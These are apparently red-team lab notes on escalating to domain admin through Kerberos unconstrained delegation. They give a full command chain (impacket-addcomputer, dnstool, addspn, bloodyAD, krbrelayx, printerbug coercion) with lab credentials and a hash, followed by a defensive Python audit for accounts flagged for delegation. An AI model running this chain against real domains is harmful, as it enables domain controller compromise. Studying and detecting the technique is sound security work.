Domain Escalation: Unconstrained Delegation - Red Teaming
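“KUD Unconstrained” refers to Kerberos Unconstrained Delegation.
Typically used when a user is found to hold the SeEnableDelegationPrivilege user right.
We need a machine account, configure unconstrained delegation on it, and then coerce the domain controller into authenticating to that machine. This requires the ability to add a machine account as well as a DNS entry (needed for the coercion, because Kerberos uses names rather than IP addresses).
# Create a computer account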
impacket-addcomputer delegate.vl/N.Thompson:KALEB_2341 -computer-name hack -computer-pass Admin123 -dc-ip 10.129.234.69
# Add a DNS record
dnstool.py -u 'delegate.vl\hack$' -p 'Admin123' --action add -r hack.delegate.vl -d 10.10.14.69 --type A -dns-ip 10.129.234.69
# Add an SPN (--additional may be needed on a second run)
addspn.py -u 'delegate.vl\N.Thompson' -p 'KALEB_2341' -s 'ldap/hack.delegate.vl' -t 'hack$' -dc-ip 10.129.234.69 dc1.delegate.vl
# Configure unconstrained delegation
bloodyAD --host dc1.delegate.vl -d delegate.vl -u N.Thompson -p KALEB_2341 add uac 'hack$' -f TRUSTED_FOR_DELEGATION
# Start the listener
krbrelayx.py -hashes :e45a314c664d40a227f9540121d1a29d
# Coerce authentication
printerbug.py -hashes :e45a314c664d40a227f9540121d1a29d 'delegate.vl/hack$@dc1.delegate.vl' hack.delegate.vl
# Check whether machine accounts can be added
nxc ldap delegate.vl -u N.Thompson -p KALEB_2341 -M maq
# Check DNS resolution
nslookup hack.delegate.vl dc1.delegate.vl
# Check whether the configuration succeeded
Get-ADComputer hack -Properties TrustedForDelegation | Select-Object Name, TrustedForDelegation
bloodyAD --host dc1.delegate.vl -d delegate.vl -u N.Thompson -p KALEB_2341 get object 'hack$' |grep userAccountControl
# Convert the password to a hash
python -c "password = 'Admin123'; import hashlib; print(hashlib.new('md4', password.encode('utf-16le')).hexdigest())"
# Check for authentication coercion
nxc smb dc1.delegate.vl -u 'hack$' -p Admin123 -M coerce_plus
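
From the defender's side, the userAccountControl check above can be run across every computer account to find non-DC machines trusted for unconstrained delegation, especially ones joined through the machine account quota. This is an added example, not part of the original notes; it assumes the accounts were already exported from LDAP as dictionaries, and the sample records and SID are constructed.

```python
# Added defensive example: audit computer accounts for unconstrained delegation.
# All records below are constructed sample data, not output from a real domain.

# userAccountControl bit values as documented by Microsoft.
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x1000: "WORKSTATION_TRUST_ACCOUNT",
    0x2000: "SERVER_TRUST_ACCOUNT",      # set on domain controllers
    0x80000: "TRUSTED_FOR_DELEGATION",   # unconstrained delegation
}

def decode_uac(value):
    """Return the names of the known flags set in a userAccountControl value."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]

def audit(records):
    """Flag non-DC accounts that are trusted for unconstrained delegation.

    Severity is 'high' when mS-DS-CreatorSID is present, meaning the account
    was created by an ordinary user through ms-DS-MachineAccountQuota.
    """
    findings = []
    for rec in records:
        flags = decode_uac(int(rec["userAccountControl"]))
        if "TRUSTED_FOR_DELEGATION" not in flags:
            continue
        if "SERVER_TRUST_ACCOUNT" in flags:
            continue  # domain controllers carry this flag by design
        severity = "high" if rec.get("mS-DS-CreatorSID") else "review"
        findings.append({"name": rec["sAMAccountName"],
                         "severity": severity, "flags": flags})
    return findings

# Constructed sample records (hypothetical values).
SAMPLE = [
    {"sAMAccountName": "DC1$", "userAccountControl": 0x82000},
    {"sAMAccountName": "hack$", "userAccountControl": 0x81000,
     "mS-DS-CreatorSID": "S-1-5-21-1111111111-2222222222-3333333333-1104"},
    {"sAMAccountName": "APP01$", "userAccountControl": 0x81000},
    {"sAMAccountName": "WS01$", "userAccountControl": 0x1000},
]

if __name__ == "__main__":
    for f in audit(SAMPLE):
        print(f"{f['severity']:6} {f['name']:8} {', '.join(f['flags'])}")
```

Accounts reported as "review" may be legitimate legacy servers; the "high" case, a user-created machine account with the delegation flag, has no normal administrative reason to exist.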